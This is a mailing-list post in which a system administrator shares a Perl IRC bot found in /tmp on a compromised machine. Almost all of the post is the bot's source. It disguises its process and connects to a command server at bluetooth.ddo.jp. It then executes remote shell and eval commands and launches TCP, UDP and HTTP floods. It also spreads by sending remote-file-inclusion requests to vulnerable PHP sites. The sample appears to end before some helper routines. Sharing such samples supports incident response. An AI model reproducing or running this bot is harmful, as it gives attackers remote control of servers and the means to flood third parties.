Security Incidents mailing list archives
Re: High volume of Mambo scans
From: nixon () kroemeke eu
Date: 18 Aug 2006 11:22:40 -0000
I've found something similar on one of my machines (tmp) :
-- cut --
#!/usr/bin/perl
# this spreader is coded by xdh
# xdh () bsdmail com
# only for testing...
my @nickname = ("index.php?page=",
"Abdulrazak",
"Ackerman",
"Adams",
"Addison",
"Adelstein",
"Adibe",
"Adorno",
"Ahlers",
"Alavi",
"Alcorn",
"Alda",
"Aleks",
"Allison",
"Alongi",
"Altavilla",
"Altenberger",
"Altenhofen",
"Amaral",
"Amatangelo",
"Ameer",
"Amsden",
"Anand",
"Andel",
"Ando",
"Andrelus",
"Andron",
"Anfinrud",
"Ansley",
"Anthony",
"Antos",
"Arbia",
"Arduini",
"Arellano",
"Aristotle",
"Arjas",
"Arky",
"Atkins",
"Augustus",
"Aurelius",
"Axelrod",
"Axworthy",
"Ayiemba",
"Aykroyd",
"Ayling",
"Azima",
"Bachmuth",
"Backus",
"Bady",
"Baglivo",
"Bagnold",
"Bailar",
"Bakanowsky",
"Baleja",
"Ballatori",
"Ballew",
"Baltz",
"Banta",
"Barabesi",
"Barajas",
"Baranczak",
"Baranowska",
"Barberi",
"Barbetti",
"Barneson",
"Barnett",
"Barriola",
"Barry",
"Bartholomew",
"Bartolome",
"Bartoo",
"Basavappa",
"Bashevis",
"Batchelder",
"Baumiller",
"Bayles",
"Bayo",
"Beacon",
"Beal",
"Bean",
"Beckman",
"Beder",
"Bedford",
"Behenna",
"Belanger",
"Belaoussof",
"Belfer",
"Belin-Collart",
"Bellavance",
"Bellhouse",
"Bellini",
"Belloc",
"Benedict-Dye",
"Bergson",
"Berke-Jenkins",
"Bernardo",
"Bernassola",
"Bernston",
"Berrizbeitia",
"Betti",
"Beynart",
"Biagioli",
"Bickel",
"Binion",
"Bir",
"Bisema",
"Bisho",
"Blackbourn",
"Blackwell",
"Blagg",
"Blakemore",
"Blanke",
"Bliss",
"Blizard",
"Bloch",
"Bloembergen",
"Bloemhof",
"Bloxham",
"Blyth",
"Bolger",
"Bolick",
"Bollinger",
"Bologna",
"Boner",
"Bonham",
"Boniface",
"Bontempo",
"Book",
"Bookbinder",
"Boone",
"Boorstin",
"Borack",
"Borden",
"Bossi",
"Bothman",
"Botosh",
"Boudin",
"Boudrot",
"Bourneuf",
"Bowers",
"Boxer",
"Boyajian",
"Boyes",
"Boyland",
"Boym",
"Boyne",
"Bracalente",
"Bradac",
"Bradach",
"Brecht",
"Breed",
"Brenan",
"Brennan",
"Brewer",
"Brewer",
"Bridgeman",
"Bridges",
"Brinton",
"Britz",
"Broca",
"Brook",
"Brzycki",
"Buchan",
"Budding",
"Bullard",
"Bunton",
"Burden",
"Burdzy",
"Burke",
"Burridge",
"Busetta",
"Byatt",
"Byerly",
"Byrd",
"Cage",
"Calnan",
"Cammelli",
"Cammilleri",
"Canley",
"Capanni",
"Caperton",
"Capocaccia",
"Capodilupo",
"Cappuccio",
"Capursi",
"Caratozzolo",
"Carayannopoulos",
"Carlin",
"Carlos",
"Carlyle",
"Carmichael",
"Caroti",
"Carper",
"Cartmill",
"Cascio",
"Case",
"Caspar",
"Castelda",
"Cavanagh",
"Cavell",
"Ceniceros",
"Cerioli",
"Chapman",
"Charles",
"Cheang",
"Cherry",
"Chervinsky",
"Chiassino",
"Chien",
"Childress",
"Childs",
"Chinipardaz",
"Chinman",
"Christenson",
"Christian",
"Christiano",
"Christie",
"Christopher",
"Chu",
"Chupasko",
"Church",
"Ciampaglia",
"Cicero",
"Cifarelli",
"Claffey",
"Clancy",
"Clark",
"Clement",
"Clifton",
"Clow",
"Coblenz",
"Coito",
"Coldren",
"Colella",
"Collard",
"Collis",
"Compton",
"Compton",
"Comstock",
"Concino",
"Condodina",
"Connors",
"Corey",
"Cornish",
"Cosmides",
"Counter",
"Coutaux",
"Crawford",
"Crocker",
"Croshaw",
"Croxen",
"Croxton",
"Cui",
"Currier",
"Cutler",
"Cvek",
"Cyders",
"daSilva",
"Daldalian",
"Daly",
"D'Ambra",
"Danieli",
"Dante",
"Dapice",
"D'arcangelo",
"Das",
"Dasgupta",
"Daskalu",
"David",
"Dawkins",
"DeGennaro",
"DeLaPena",
"del'Enclos",
"deRousse",
"Debroff",
"Dees",
"Defeciani",
"Delattre",
"Deleon-Rendon",
"Delger",
"Dell'acqua",
"Deming",
"Dempster",
"Demusz",
"Denault",
"Denham",
"Denison",
"Desombre",
"Deutsch",
"D'fini",
"Dicks",
"Diefenbach",
"Difabio",
"Difronzo",
"Dilworth",
"Dionysius",
"Dirksen",
"Dockery",
"Doherty",
"Donahue",
"Donner",
"Doonan",
"Dore",
"Dorf",
"Dosi",
"Doty",
"Doug",
"Dowsland",
"Drinker",
"D'souza",
"Duffin",
"Durrett",
"Dussault",
"Dwyer",
"Eardley",
"Ebeling",
"Eckel",
"Edley",
"Edner",
"Edward",
"Eickenhorst",
"Eliasson",
"Elmendorf",
"Elmerick",
"Elvis",
"Encinas",
"Enyeart",
"Eppling",
"Erbach",
"Erdman",
"Erdos",
"Erez",
"Espinoza",
"Estes",
"Etter",
"Euripides",
"Everett",
"Fabbris",
"Fagan",
"Faioes",
"Falco-Acosta",
"Falorsi",
"Faris",
"Farone",
"Farren",
"Fasso'",
"Fates",
"Feigenbaum",
"Fejzo",
"Feldman",
"Fernald",
"Fernandes",
"Ferrante",
"Ferriell",
"Feuer",
"Fido",
"Field",
"Fink",
"Finkelstein",
"Finnegan",
"Fiorina",
"Fisk",
"Fitzmaurice",
"Flier",
"Flores",
"Folks",
"Forester",
"Fortes",
"Fortier",
"Fossey",
"Fossi",
"Francisco",
"Franklin-Kenea",
"Franz",
"Frazier-Davis",
"Freid",
"Freundlich",
"Fried",
"Friedland",
"Frisken",
"Frowiss",
"Fryberger",
"Frye",
"Fujii-Abe",
"Fuller",
"Furth",
"Fusaro",
"Gabrielli",
"Gaggiotti",
"Galeotti",
"Galwey",
"Gambini",
"Garfield",
"Garman",
"Garonna",
"Geller",
"Gemberling",
"Georgi",
"Gerrett",
"Ghorai",
"Gibbens",
"Gibson",
"Gilbert",
"Gili",
"Gill",
"Gillispie",
"Gist",
"Gleason",
"Glegg",
"Glendon",
"Goldfarb",
"Goncalves",
"Good",
"Goodearl",
"Goody",
"Gozzi",
"Gravell",
"Greenberg",
"Greenfeld",
"Griffiths",
"Grigoletto",
"Grummell",
"Gruner",
"Gruppe",
"Guenthart",
"Gunn",
"Guo",
"Ha",
"Haar",
"Hackman",
"Hackshaw",
"Haley",
"Halkias",
"Hallowell",
"Halpert",
"Hambarzumjan",
"Hamer",
"Hammerness",
"Hand",
"Hanssen",
"Harding",
"Hargraves",
"Harlow",
"Harrigan",
"Hartman",
"Hartmann",
"Hartnett",
"Harwell",
"Haviaras",
"Hawkes",
"Hayes",
"Haynes",
"Hazlewood",
"Heermans",
"Heft",
"Heiland",
"Hellman",
"Hellmiss",
"Helprin",
"Hemphill",
"Henery",
"Henrichs",
"Hernandez",
"Herrera",
"Hester",
"Heubert",
"Heyeck",
"Himmelfarb",
"Hind",
"Hirst",
"Hitchcock",
"Hoang",
"Hock",
"Hoffer",
"Hoffman",
"Hokanson",
"Hokoda",
"Holmes",
"Holoien",
"Holter",
"Holway",
"Holzman",
"Hooker",
"Hopkins",
"Horsley",
"Hoshida",
"Hostage",
"Hottle",
"Howard",
"Hoy",
"Huey",
"Huidekoper",
"Hungerford",
"Huntington",
"Hupp",
"Hurtubise",
"Hutchings",
"Hyde",
"Iaquinta",
"Ichikawa",
"Igarashi",
"Inamura",
"Inniss",
"Isaac",
"Isaievych",
"Isbill",
"Isserman",
"Iyer",
"Jacenko",
"Jackson",
"Jagers",
"Jagger",
"Jagoe",
"Jain",
"Jamil",
"Janjigian",
"Jarnagin",
"Jarrell",
"Jay",
"Jeffers",
"Jellis",
"Jenkins",
"Jespersen",
"Jewett",
"Johannesson",
"Johannsen",
"Johns",
"Jolly",
"Jorgensen",
"Jucks",
"Juliano",
"Julious",
"Kabbash",
"Kaboolian",
"Kafadar",
"Kalbfleisch",
"Kaligian",
"Kalil",
"Kalinowski",
"Kalman",
"Kamel",
"Kangis",
"Karpouzes",
"Kassower",
"Kasten",
"Kawachi",
"Kee",
"Keenan",
"Keepper",
"Keith",
"Kelker",
"Kelsey",
"Kempton",
"Kemsley",
"Kendall",
"Kerry",
"Keul",
"Khong",
"Kimmel",
"Kimmett",
"Kimura",
"Kindall",
"Kinsley",
"Kippenberger",
"Kirscht",
"Kittridge",
"Kleckner",
"Kleiman",
"Kleinfelder",
"Klemperer",
"Kling",
"Klinkenborg",
"Klint",
"Knuff",
"Kobrick",
"Koch",
"Kohn",
"Koivumaki",
"Kommer",
"Koniaris",
"Konrad",
"Kool",
"Korzybski",
"Kotter",
"Kovaks",
"Kraemer",
"Krailo",
"Krasney",
"Kraus",
"Kroemer",
"Krysiak",
"Kuenzli",
"Kumar",
"Kusman",
"Kuwabara",
"La",
"Labunka",
"Lafler",
"Laing",
"Lallemant",
"Landes",
"Lankes",
"Lantieri",
"Lanzit",
"Laserna",
"Lashley",
"Lawless",
"Lecar",
"Lecce",
"Leclercq",
"Leite",
"Lenard",
"l'Enclos",
"Lesser",
"Lessi",
"Liakos",
"Lidano",
"Liem",
"Light",
"Lightfoot",
"Lim",
"Linares",
"Linda",
"Linder",
"Line",
"Linehan",
"Linzee",
"Lippmann",
"Lipponen",
"Little",
"Litvak",
"Livernash",
"Livi",
"Livolsi",
"Lizardo",
"Locatelli",
"Longworth",
"Loss",
"Loveman",
"Lowenstein",
"Loza",
"Lubin",
"Lucas",
"Luciano",
"Luczkow",
"Luecke",
"Lunetta",
"Luoma",
"Lussier",
"Lutcavage",
"Luzader",
"Ma",
"Maccormac",
"Macdonald",
"Maceachern",
"Macintyre",
"Mackenney",
"MacMillan",
"Macy",
"Madigan",
"Maggio",
"Mahony",
"Maier",
"Maine-Hershey",
"Maisano",
"Malatesta",
"Maller",
"Malova",
"Manalis",
"Mandel",
"Manganiello",
"Mantovan",
"March",
"Marchbanks",
"Marcus",
"Margalit",
"Margetts",
"Marques",
"Martinez",
"Martochio",
"Marton",
"Marubini",
"Mass",
"Matalka",
"Matarazzo",
"Matsukata",
"Mattson",
"Mauzy",
"May",
"Mazzali",
"Mazziotta",
"Mcbride",
"Mccaffery",
"Mccall",
"Mcclearn",
"Mcdowell",
"Mcelroy",
"McFadden",
"Mcghee",
"Mcgoldrick",
"McIlroy",
"Mcintosh",
"Mckenna",
"Mclane",
"Mclaren",
"Mcnealy",
"Mcnulty",
"Meccariello",
"Memisoglu",
"Menzies",
"Merikoski",
"Merlani",
"Merminod",
"Merseth",
"Merz",
"Metelka",
"Metropolis",
"Meurer",
"Michelman",
"Middle",
"Mieher",
"Mills",
"Minh",
"Mini",
"Minichiello",
"Gonzalez",
"Mitropoulos",
"Mittal",
"Mocroft",
"Modestino",
"Moeller",
"Mohr",
"Moiamedi",
"Monque",
"Montilio",
"MooreDeCh.",
"Morani",
"Moreton",
"Morrison",
"Morrow",
"Mortimer",
"Mosher",
"Mosler",
"Mostafavi",
"Motooka",
"Mudarri",
"Muello",
"Mugnai",
"Mulkern",
"Mulroy",
"Mumford",
"Mussachio",
"Naddeo",
"Napolitano",
"Nardi",
"Nardone",
"Naviaux",
"Nayduch",
"Nelson",
"Nenna",
"Nesci",
"Neuman",
"Newfeld",
"Newlin",
"Ng",
"Ni",
"Nickerson",
"Nickoloff",
"Nisenson",
"Nitabach",
"Notman",
"Nuzum",
"Ocougne",
"Ogata",
"Oh",
"O'hagan",
"Oldford",
"Olsen",
"Olson",
"Olszewski",
"O'malley",
"Oman",
"O'meara",
"Opel",
"Oray",
"Orfield",
"Orsi",
"Ospina",
"Ostrowski",
"Ottaviani",
"Otten",
"Ouchida",
"Ovid",
"PaesDealmeida",
"Paine",
"Palayoor",
"Palepu",
"Pallara",
"Palmitesta",
"Panadero",
"Panizzon",
"Pantilla",
"Paoletti",
"Parmeggiani",
"Parris",
"Partridge",
"Pascucci",
"Patefield",
"Patrick",
"Pattullo",
"Pavetti",
"Pavlon",
"Pawloski",
"Paynter",
"Peabody",
"Pearlberg",
"Pederson",
"Peishel",
"Penny",
"Pereira",
"Perko",
"Perlak",
"Perlman",
"Perna",
"Perone",
"Perrimon",
"Peters",
"Petruzello",
"Pettibone",
"Pettit",
"Pfister",
"Pilbeam",
"Pinot",
"Plancon",
"Plant",
"Plasket",
"Plous",
"Po",
"Pocobene",
"Poincaire",
"Pointer",
"Poirier",
"Polak",
"Polanyi",
"Politis",
"Poma",
"Poolman",
"Powers",
"Presper",
"Preucel",
"Prevost",
"Pritchard",
"Pritz",
"Proietti",
"Prothrow-Stith",
"Puccia",
"Pugh",
"Pynchon",
"Quaday",
"Quetin",
"Rabe",
"Rabkin",
"Radeke",
"Rajagopalan",
"Raney",
"Rangan",
"Rankin",
"Rapple",
"Rayport",
"Redden-Tyler",
"Reedquist",
"Cunningham",
"Reinold",
"Remak",
"Renick",
"Repetto",
"Resnik",
"Rhea",
"Richmond",
"Rielly",
"Rindos",
"Rineer",
"Rish",
"Rivera",
"Robinson",
"Rocha",
"Roesler",
"Rogers",
"Ronen",
"Row",
"Royal",
"Ru",
"Ruan",
"Ruderman",
"Ruescher",
"Rush",
"Ryu",
"Sabatello",
"Sadler",
"Safire",
"Sahu",
"Sali",
"Samson",
"Sanchez-Ramirez",
"Sanna",
"Sapers",
"Sarin",
"Sartore",
"Sase",
"Satin",
"Satta",
"Satterthwaite",
"Sawtell",
"Sayied",
"Scarponi",
"Scepan",
"Scharf",
"Scharlemann",
"Scheiner",
"Schiano",
"Schifini",
"Schilling",
"Schmitt",
"Schossberger",
"Schuman",
"Schutte",
"Schuyler",
"Schwan",
"Schwickrath",
"Scovel",
"Scudder",
"Seaton",
"Seeber",
"Segal",
"Sekler",
"Selvage",
"Sen",
"Sennett",
"Seterdahl",
"Sexton",
"Seyfert",
"Shaikh",
"Shakis",
"Shankland",
"Shanley",
"Shar",
"Shatrov",
"Shavelson",
"Shea",
"Sheats",
"Shepherd",
"Sheppard",
"Shepstone",
"Shesko",
"Shia",
"Shibata",
"Shimon",
"Siesto",
"Sigalot",
"Sigini",
"Signa",
"Silverman",
"Silvetti",
"Sinsabaugh",
"Sirilli",
"Sites",
"Skane",
"Skerry",
"Skoda",
"Sloan",
"Slowe",
"Smilow",
"Sniffen",
"Snodgrass",
"Socolow",
"Solon",
"Somers",
"Sommariva",
"Sorabella",
"Sorg",
"Sottak",
"Soukup",
"Soule",
"Soultanian",
"Spanier",
"Sparrow",
"Spaulding",
"Speizer",
"Spence",
"Sperber",
"Spicer",
"Spiegelhalter",
"Spiliotis",
"Spinrad",
"StMartin",
"Stalvey",
"Stam",
"Stang",
"Stassinopolus",
"States",
"Statlender",
"Stefani",
"Steiner",
"Stephanian",
"Stepniewska",
"Stewart-Oaten",
"Stiepock",
"Stillwell",
"Stock",
"Stockton",
"Stockwell",
"Stolzenberg",
"Stonich",
"Storer",
"Stott",
"Strange",
"Strauch",
"Streiff",
"Stringer",
"Sullivan",
"Sumner",
"Suo",
"Surdam",
"Sweeting",
"Sweetser",
"Swindle",
"Tagiuri",
"Tai",
"Talaugon",
"Tambiah",
"Tandler",
"Tanowitz",
"Tatar",
"Taveras",
"Tawn",
"Tcherepnin",
"Teague",
"Temes",
"Temmer",
"Tenney",
"Terracini",
"Than",
"Thavaneswaran",
"Theodos",
"Thibault",
"Thisted",
"Thomsen",
"Throop",
"Tierney",
"Till",
"Timmons",
"Tofallis",
"Tollestrup",
"Tolls",
"Tolman",
"Tomford",
"Toomer",
"Topulos",
"Torresi",
"Torske",
"Towler",
"Toye",
"Traebert",
"Trenga",
"Trewin",
"Tringali",
"Troiani",
"Troy",
"Truss",
"Tsiatis",
"Tsomides",
"Tsukurov",
"Tuck",
"Tudge",
"Tukan",
"Turano",
"Turek",
"Tuttle",
"Twells",
"Tzamarias",
"Ullman",
"Untermeyer",
"Upsdell",
"Urban",
"Urdang-Brown",
"Usdan",
"Uzuner",
"Vacca",
"Waite",
"Valberg",
"Valencia",
"Wales",
"Wallenberg",
"Walter",
"vanAllen",
"VanZwet",
"Vandenberg",
"Vanheeckeren",
"Warshafsky",
"Wasowska",
"Vasquez",
"Waugh",
"Weighart",
"Weingarten",
"Weinhaus",
"Weissbourd",
"Weissman",
"Velasquez",
"Welles",
"Welsh",
"Wengret",
"Venne",
"Verghese",
"Wescott",
"Wetzel",
"Whately",
"Whilton",
"White",
"Whitla",
"Whittaker",
"Viana",
"Viano",
"Wiedersheim",
"Wiener",
"Viens",
"Vignola",
"Wilder",
"Wilhelm",
"Wilk",
"Wilkin",
"Wilkinson",
"Villarreal",
"Willstatter",
"Wilson",
"Vitali",
"Viviani",
"Voigt",
"Wolk",
"VonHoffman",
"Woo",
"Wooden",
"Woods",
"Woods-Powell",
"Vorhaus",
"Votey",
"Yacono",
"Yamane",
"Yankee",
"Yarchuk",
"Yates",
"Ybarra",
"Yedidia",
"Yesson",
"Yetiv",
"Yoffe",
"Yoo",
"Youk-See",
"Yu",
"Zachary",
"Zahedi",
"Zangwill",
"Zegans",
"Zerbini",
"Zoldak",
"Zucconi",
"Zurn",
"Zwiers");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
#system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`");
my $processo = 'httpdse';
# funny world...
my $linas_max='4';
my $sleep='5';
my @adms=("anthis");
my @hostauth=("magic.kurwa");
my @canais=("#!voker");
chop (my $realname = 'id');
$servidor='bluetooth.ddo.jp' unless $servidor;
my $porta='8892';
my $VERSAO = 'BUCEFALO';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout
=> 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1."
seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1."
seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for
".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent
".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
